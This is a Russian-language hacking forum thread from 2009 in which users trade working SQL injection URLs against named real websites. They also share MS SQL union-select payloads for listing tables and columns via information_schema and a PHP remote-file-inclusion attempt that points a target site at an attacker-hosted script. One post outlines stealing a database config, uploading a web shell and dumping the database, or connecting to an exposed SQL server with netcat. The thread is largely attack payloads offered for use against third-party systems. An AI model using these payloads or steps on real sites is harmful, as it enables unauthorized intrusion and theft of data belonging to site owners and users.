HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.11.2009, 20:13
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
По умолчанию

Цитата:
Сообщение от YuNi|[c  
спс |1ght я уже много раз прочитал ту статью. Твой линк помоему ничего не изменил вроде. Неужели от явного скуля нельзя что то делать?

Код:
http://wallstreetcorner.com/disclaimer.html?Symbol=TCRV%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+Situations%00
 
Ответить с цитированием

  #2  
Старый 10.11.2009, 12:48
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503

Репутация: 229
По умолчанию

Цитата:
т.е. актино приниается, или редко встречается ? (по сравнение SQL инекции)
Зайди в тему "Энциклопедия уязвимых скриптов" да и посмотри
(имхо sql-inj чаще встречается)

Цитата:
на сколько понял - о сливи БД тут речь не может идти.. это уже SQL инекцями, да?
Почему это?

1. Сливаешь конфиг файл для подкл. к БД, смотришь пароль, пробуешь зайти под админом и под паролем который был в конфиге к примеру на форум, если захошел то заливаешь шелл и потом сливаешь БД через шелл

2. Если сервис sql доступен из интернета то просто подкл. к нему с помощью какой либо утилиты (я для этого юзаю NetCat)

Цитата:
про LFI/RFI-уязвимости читал ЗДЕСЬ , но не очень понятно был что, зачем и как.. попробую еще искать ...
Ну ты думаешь своей головою? Тебе надо искать мануалы по lfi/rfi а не уязвимости в движках (я понимаю что хочется понять вот так сразу но надо с мануалов начинать)
 
Ответить с цитированием

  #3  
Старый 10.11.2009, 12:48
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


По умолчанию

перепутал))

суть в том что сайт сам не пашет.

Последний раз редактировалось Krist_ALL; 10.11.2009 в 12:51..
 
Ответить с цитированием

  #4  
Старый 10.11.2009, 18:57
2Fed123
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426

Репутация: 5
По умолчанию

http://www.site.com/ShopList.asp?Cat=-34+union+select+1,2,3,4,5,6,table_name,8+from+info rmation_schema.tables--
Получил таблицу MyAccessLog БД MS SQL,в мускуле используется лимит,а сдесь как сделать чтобы получить имена остальных таблиц?Пробовал как в статьях 1 or 1=@@version-- и тд,запросы такие неработают.
 
Ответить с цитированием

  #5  
Старый 10.11.2009, 19:32
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

2Fed123,

cat=-1+union+select+top+1+1,2,3,4,5,6,table_name,8+from +information_schema.tables+where+table_name+not+in +(select+top+1+table_name+from+information_schema.tables)--

Хм ну как-то так вроде, поэкспериментируй
 
Ответить с цитированием

  #6  
Старый 10.11.2009, 20:27
2Fed123
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426

Репутация: 5
По умолчанию

Цитата:
Сообщение от ElteRUS  
2Fed123,

cat=-1+union+select+top+1+1,2,3,4,5,6,table_name,8+from +information_schema.tables+where+table_name+not+in +(select+top+1+table_name+from+information_schema.tables)--

Хм ну как-то так вроде, поэкспериментируй
Спасибо,все получилось.Теперь пролема с колонками
При запросе
Код:
-34+union+select+top+1+1,2,3,4,5,6,column_name,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers+AND+COLUMN_NAME+NOT+IN+(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers)
страница нормально отображается,но ничего невыводит.И если несложно объясни как и зачем все пишется
 
Ответить с цитированием

  #7  
Старый 10.11.2009, 21:01
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
По умолчанию

Цитата:
Сообщение от 2Fed123  
Спасибо,все получилось.Теперь пролема с колонками
При запросе
Код:
-34+union+select+top+1+1,2,3,4,5,6,column_name,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers+AND+COLUMN_NAME+NOT+IN+(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers)
страница нормально отображается,но ничего невыводит.И если несложно объясни как и зачем все пишется
Код:
-34+UNION+SELECT+1,2,3,4,5,6, COLUMN_NAME,8+FROM INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=’MyUsers’ +LIMIT+1,1--
почитать можно тут:
https://forum.antichat.ru/thread43966.html
 
Ответить с цитированием

  #8  
Старый 10.11.2009, 19:44
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
По умолчанию

where table_name NOT IN ('table_name1')
 
Ответить с цитированием

  #9  
Старый 10.11.2009, 21:23
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
По умолчанию

Цитата:
http://wallstreetcorner.com/ss2.html?Symbol=%'%20union%20select%201,2,3,4,5,6, 7,8,'Privetttt',10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43,44,45,46%20from%20Situations%00
Только понта с этого нету.
Выводится в адресную строку браузера 9 поле где привет написано)

Последний раз редактировалось ILYAtirtir; 10.11.2009 в 21:26..
 
Ответить с цитированием

  #10  
Старый 11.11.2009, 00:11
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

наконец себе делал хост и пытаюсь поэкспереминтировать PHP инекции.
у меня сайт такой:
www.mysite.ru
цель: www.123.ru

на мой сайт залил скрипт:
Код:
<? 
.. 
Include ("$page.php"); 
… 
?>
открываю сайт жертвы, захожу в любой раздел и получаю такой адрес:
http://www.123.ru/index.php?action=page&id=149

мой код на сервере под названием ххх.php.

я переделываю ссылку так:
http://www.123.ru/index.php?action=http://mysite.ru/xxx.php
- открывается главная страница.
делаю так:
http://www.123.ru/index.php?action=page&id=http://mysite.ru/xxx.php
пишет:
Запрашиваемая вами страница не найдена.

Я ошибку делаю, или просто на сайте фильтровывается ?

P.S. читал здесь:
http://forum.antichat.ru/thread12123-lfi.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.